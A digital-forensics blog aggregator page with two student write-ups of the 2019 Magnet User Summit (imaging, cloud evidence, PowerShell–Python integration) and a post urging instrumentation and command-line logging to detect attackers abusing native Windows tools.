Forensic Blogs

An aggregator for digital forensics blogs

by

Magnet User Summit Experience

Thanks to Champlain College, I was able to attend this year’s Magnet User Summit. As a first year, I was concerned as to how well I would understand the topics and concepts. However, I found that I was well prepared. My internship this semester at the LCDI helped most of all, as it provided me with knowledge not just of digital forensics, but of the work environment as well. The conference was fascinating, and I was able to learn more about the ever-changing environment of ITS.

Improvise, Adapt, and Overcome

The Improvise, Adapt, Overcome: A New Mantra for Digital Forensics Professionals lecture was presented by Cindy Murphy, president of Gillware Digital Forensics. The talk focused on challenging the unwritten rules and truths of cybersecurity and digital forensics and turning to improvise, adapt, and overcome obstacles. Specifically, it challenged the rules and knowledge of imaging, firmware, and hardware. With imaging, Murphy discussed how an image that shows all zeros it is not actually empty. You’re also not getting a full forensic image from a hard drive. Murphy also mentioned the importance of investigating NAND flash memory, which is often overlooked.

With firmware, Murphy discussed how important its role is as the go-between for hardware and operating systems, and how its role is frequently underestimated. Hardware has this similar issue of being neglected in investigations. In fact, removing chips from damaged hardware to identical functioning hardware can be incredibly helpful with investigations. Most importantly, Murphy argued members of the ITS industry need to learn to keep moving forward in this ever-changing environment.

Guest Keynote on the Evolution of the Digital World

The guest keynote was presented by Ovie Carroll, director of DOJ CCIPS Cybercrime Lab, SANS instructor, and author. He reflected on the evolution of the digital world and segued into the newest innovations of the modern day and what’s to come. This included Bluetooth stones and other similar devices, which currently serve as miniature hotspots that relay information to smartphone-clad passerby and clouds. Carroll explained how clouds add value to the pre-search phase of investigations. Cloud storage is becoming more common, lessening the value in seizing hardware and increasing obtaining data before it’s deleted remotely. He also discussed the rising frequency of encrypted computers, and the importance of RAM images, encryption, and hard drive images. We were reminded and provided digital examples of Locard’s evidence transfer principals.

Discussions relating to mental health and self-confidence were brought up as well. We were reminded there’s no such thing as a full forensic investigation and that you will always miss an artifact. As a result, the investigator shouldn’t feel disheartened when their data is passed to a second pair of eyes. In fact, a collaborative approach to forensics analysis was recommended and was echoed by many in the following talks.

Powershell vs Python

The Leveraging Powershell and Python for Incident Response and Live Forensic Applications lecture was presented by Chet Hosmer, author of Python Forensics. The fundamentals, integration, and applications of both Powershell and Python were discussed. Hosmer presented Powershell as a great acquisition engine that provides digital investigators with a set of cmdlets and access to the internals Windows, Linux, and Mac desktops and cloud services. He presented Python as a relatively straight forward, understandable, and object-oriented scripting language. Its environment allows for the rapid development of new tools, deep analysis, automation, and the correlation of evidence. Hosmer then demonstrated two different integrations live. Both of these integrations allow for better solutions for incident response, live forensic investigation, and e-Discovery.

I was able to attend many other lectures as well, such as the Magnet Forensics keynote, the Panel of Corporate Forensics Experts, and the Axiom Essentials Lab. The conference covered a wide range of fascinating topics, yet provided a consistent environment that was friendly and inviting. Other participants were eager to speak with Champlain students and viewed us as  equals, sharing tips and engaging in discussion. It’s a community myself and other students are excited to participate in, and hope to again at the next conference!

 

Blog written by Champlain College first year Hayley Froio.

Be sure to check us out on Twitter @ChampForensics, Instagram @ChampForensics, and Facebook @Champlainforensics to see other important information pertaining to our project!

The post Magnet User Summit Experience appeared first on The Leahy Center for Digital Forensics & Cybersecurity.

by

Leveraging PowerShell & Python MUS 2019

Leveraging PowerShell & Python for Incident Response & Live Investigation With Chet Hosmer

Recently, I had the great opportunity to attend the 2019 Magnet User Summit hosted by Magnet Forensics in Nashville, Tennessee. Presenters at the Magnet User Summit dedicate their time to presenting new research, demonstrating new techniques, and teaching users in the fields of digital forensics and investigation. There were many great presentations and labs that I attended and learned so much from!

As someone who uses Windows PowerShell and Python for scripting, I took notice in a presentation called “Leveraging PowerShell & Python for Incident Response & Live Investigations” presented by Chet Hosmer, founder of Python Forensics. I was excited to find new ways to expand my knowledge of PowerShell and Python and increase my proficiency.

PowerShell and Python

Windows PowerShell is a command shell and scripting language created by Microsoft. It provides more features and functionalities than Windows basic command line. System and network administrators use PowerShell for automation and also forensic investigators. PowerShell excels at automation and acquiring evidence and artifacts from the system. It has recently been made available for other operating systems including Linux and OSX. Making it even more powerful and useful. Python is an object oriented scripting and programming language. It’s a simple language that’s easy for beginners but still powerful enough for the more experienced users. It’s been integrated into many popular tools for digital forensics, cybersecurity, and incident response.

One point that Hosmer highlighted is that Microsoft’s PowerShell really excells at evidence and artifact acquisition, while Python is good at analysis and examination of data. Therefore, combining these two programs would create a powerful platform for DFIR. To accomplish this, he has created two methods of integration between the two programs.

Image taken from Chet Hosmer

Integrating PowerShell and Python

The first method involves creating a Python script that would accept PowerShell parameters as input, launch PowerShell, and pass those parameters to a PowerShell script. That would then read, analyze and present the results. The second method begins with a PowerShell script. The PowerShell script would launch Python and run through the PowerShell scripts, piping its results to a Python script for it to analyze and organize the data. Both methods will work equally, but if one is more experienced in PowerShell, they may want to use the second method and vice versa. Using the ‘subprocess’ command in Python allows for variables to pass through a PowerShell script. PowerShell can input to Python using a standard pipe, like “| & $Python $Script”. Users can then use he piped data with “stdin” in Python.

With the rise of cloud infrastructure and international use, Hosmer also demonstrated that PowerShell is capable of interacting with and accessing Microsoft Azure logs. Azure is Microsoft’s cloud platform created for large businesses and enterprise. Cloud has become a large source of data and potential evidence for digital investigators, but is often harder to access and difficult to integrate into programs. In order to interact with azure, the user installs a PowerShell module called ‘AzureRM’  using the ‘Install-Module’ cmdlet in PowerShell. Once installed, PowerShell will have access to thousands of more powerful cmdlets dedicated to Azure.

Conclusion

Over my two days at Magnet User Summit, I met with many professionals and had a great time attending presentations on new technologies and techniques. I also learned how to use the tools created by Magnet and improve my forensics skills. While I really did learn a lot from the summit and had plenty of fun too. I am glad I got this great opportunity to learn and network with industry professionals. Thank you to both the Leahy Center for Digital Investigation and Magnet Forensics for giving me this great opportunity.

 

Blog written by Champlain College sophomore Chris Mathieson

Be sure to check us out on Twitter @ChampForensics, Instagram @ChampForensics, and Facebook @Champlainforensics to see other important information pertaining to our project!

The post Leveraging PowerShell & Python MUS 2019 appeared first on The Leahy Center for Digital Investigation.

by

The Need for Instrumentation

The Need for Instrumentation
Almost everyone likes spies, right?  Jason Bourne, James Bond, that sort of thing?  One of things you don't see in the movies is the training these super spies go through, but you have to imagine that it's pretty extensive, if they can pop up in a city that they maybe haven't been to and transition seamlessly into the environment.

The same thing is true of targeted adversaries...they're able to seamlessly blend into your environment.  Like special operations forces, they learn how to use tools native to the environment in order to get the information that they're after, whether it's initial reconnaissance of the host or the infrastructure, locating items of interest, moving laterally within the infrastructure, or exfiltrating data.

I caught this post from JPCERT/CC that discusses Windows commands abused by attackers.  The author takes a different approach from previous posts and shares some of the command lines used, but also focuses on the frequency of use for each tool.  There's also a section in the post that recommends using GPOs to restrict the use of unnecessary commands.  An alternative approach might be to track attempts to use the tools, by creating a trigger to write a Windows Event Log record (discussed previously in this post).  When incorporated into an overall log management (SEIM, filtering, alerting, etc.) framework, this can be an extremely valuable detection mechanism.

If you're not familiar with some of the tools that you see listed in the JPCERT/CC blog post, try running them, starting by typing the command followed by "/?".

TradeCraft Tuesday - Episode #6 discusses how Powershell can be used and abused. The presenters (one of whom is Kyle Hanslovan) strongly encourage interaction (wow, does that sound familiar at all?) with the presentation via Twitter.  During the presentation, the guys talk about Powershell being used to push base64 encoded commands into the Registry for later use (often referred to as "fileless"), and it doesn't stop there.  Their discussion of the power of Powershell for post-exploitation activities really highlights the need for a suitable level of instrumentation in order to achieve visibility.

The use of native commands by an adversary or intruder is not new...it's been talked about before.  For example, the guys at SecureWorks talked about the same thing in the articles Linking Users to Systems and Living off the Land.  Rather than talking about what could be done, these articles show you data that illustrates what was actually done; not might or could, but did.

So, what do you do?  Well, I've posted previously about how you can go about monitoring for command line activity, which is usually manifest when access is achieved via RATs.

Not all abuse of native Windows commands and functionality is going to be as obvious as some of what's been discussed already.  Take this recent SecureWorks post for example...it illustrates how GPOs have been observed being abused by dedicated actors.  An intruder moving about your infrastructure via Terminal Services won't be as easy to detect using command line process creation monitoring, unless and until they resort to some form of non-GUI interaction.